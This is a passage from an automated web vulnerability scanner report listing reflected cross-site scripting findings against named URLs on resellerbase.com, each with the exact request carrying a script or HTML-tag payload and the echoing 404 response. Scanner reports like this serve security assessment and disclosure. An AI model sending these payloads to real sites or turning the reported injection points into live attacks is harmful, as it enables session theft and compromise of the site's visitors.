Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/search.php?keyword=search...&Submit3=Search84d79<a>1d5c65d3655&opt=2 was not found on this server.</p>
...[SNIP]...

2.3078. http://www.resellerbase.com/detail/42/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 4dd7f<a>06ca77471b1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/search.php?keyword=search...4dd7f<a>06ca77471b1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/search.php?keyword=search...4dd7f<a>06ca77471b1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3079. http://www.resellerbase.com/detail/42/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32db5<script>alert(1)</script>4b54d343902 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2&32db5<script>alert(1)</script>4b54d343902=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2&32db5<script>alert(1)</script>4b54d343902=1 was not found on this server.</p>
...[SNIP]...

2.3080. http://www.resellerbase.com/detail/42/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b70ce<a>cf6991554f1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2b70ce<a>cf6991554f1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2b70ce<a>cf6991554f1 was not found on this server.</p>
...[SNIP]...

2.3081. http://www.resellerbase.com/detail/44/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56ee1<script>alert(1)</script>1445f2cdb9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail56ee1<script>alert(1)</script>1445f2cdb9f/44/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail56ee1<script>alert(1)</script>1445f2cdb9f/44/ was not found on this server.</p>
...[SNIP]...

2.3082. http://www.resellerbase.com/detail/44/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6c23<script>alert(1)</script>d85bc3d5af9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44a6c23<script>alert(1)</script>d85bc3d5af9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44a6c23<script>alert(1)</script>d85bc3d5af9/ was not found on this server.</p>
...[SNIP]...

2.3083. http://www.resellerbase.com/detail/44/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cf7f5<script>alert(1)</script>767b5c57b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/?cf7f5<script>alert(1)</script>767b5c57b6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/?cf7f5<script>alert(1)</script>767b5c57b6=1 was not found on this server.</p>
...[SNIP]...

2.3084. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e0be3<script>alert(1)</script>2eb62a05850 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile0be3<script>alert(1)</script>2eb62a05850/44/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile0be3<script>alert(1)</script>2eb62a05850/44/rating.php was not found on this server.</p>
...[SNIP]...

2.3085. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89eb6<script>alert(1)</script>dd15b82a573a773bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail89eb6<script>alert(1)</script>dd15b82a573a773bd/44/rating.php?id=44&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail89eb6<script>alert(1)</script>dd15b82a573a773bd/44/rating.php?id=44&rating=5 was not found on this server.</p>
...[SNIP]...

2.3086. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24978<script>alert(1)</script>f55db671bc6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4424978<script>alert(1)</script>f55db671bc6/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4424978<script>alert(1)</script>f55db671bc6/rating.php was not found on this server.</p>
...[SNIP]...

2.3087. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e239e<script>alert(1)</script>a86fc4f29c5b5ee73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/44e239e<script>alert(1)</script>a86fc4f29c5b5ee73/rating.php?id=44&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44e239e<script>alert(1)</script>a86fc4f29c5b5ee73/rating.php?id=44&rating=5 was not found on this server.</p>
...[SNIP]...

2.3088. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 863cc<script>alert(1)</script>26d296d8bd6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/rating.php863cc<script>alert(1)</script>26d296d8bd6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/rating.php863cc<script>alert(1)</script>26d296d8bd6 was not found on this server.</p>
...[SNIP]...

2.3089. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8fb30<script>alert(1)</script>472944b2e14a93480 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/44/rating.php8fb30<script>alert(1)</script>472944b2e14a93480?id=44&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/rating.php8fb30<script>alert(1)</script>472944b2e14a93480?id=44&rating=5 was not found on this server.</p>
...[SNIP]...

2.3090. http://www.resellerbase.com/detail/44/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a1083<script>alert(1)</script>e11785da109ed9772 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/44/rating.php/a1083<script>alert(1)</script>e11785da109ed9772?id=44&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/rating.php/a1083<script>alert(1)</script>e11785da109ed9772?id=44&rating=5 was not found on this server.</p>
...[SNIP]...

2.3091. http://www.resellerbase.com/detail/44/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6d052<script>alert(1)</script>3b51c52d672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/rating.php?6d052<script>alert(1)</script>3b51c52d672=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/rating.php?6d052<script>alert(1)</script>3b51c52d672=1 was not found on this server.</p>
...[SNIP]...

2.3092. http://www.resellerbase.com/detail/44/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d66d0<script>alert(1)</script>752c46dda40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild66d0<script>alert(1)</script>752c46dda40/44/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild66d0<script>alert(1)</script>752c46dda40/44/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3093. http://www.resellerbase.com/detail/44/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 30557<script>alert(1)</script>3faaff26051 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4430557<script>alert(1)</script>3faaff26051/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4430557<script>alert(1)</script>3faaff26051/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3094. http://www.resellerbase.com/detail/44/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 96f2f<script>alert(1)</script>dfcfd691548 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/search.php96f2f<script>alert(1)</script>dfcfd691548?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/search.php96f2f<script>alert(1)</script>dfcfd691548?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3095. http://www.resellerbase.com/detail/44/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ca879<a>14873da87e3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/search.php?keyword=search...&Submit3=Searchca879<a>14873da87e3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/search.php?keyword=search...&Submit3=Searchca879<a>14873da87e3&opt=2 was not found on this server.</p>
...[SNIP]...

2.3096. http://www.resellerbase.com/detail/44/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/search.php

Issue detail

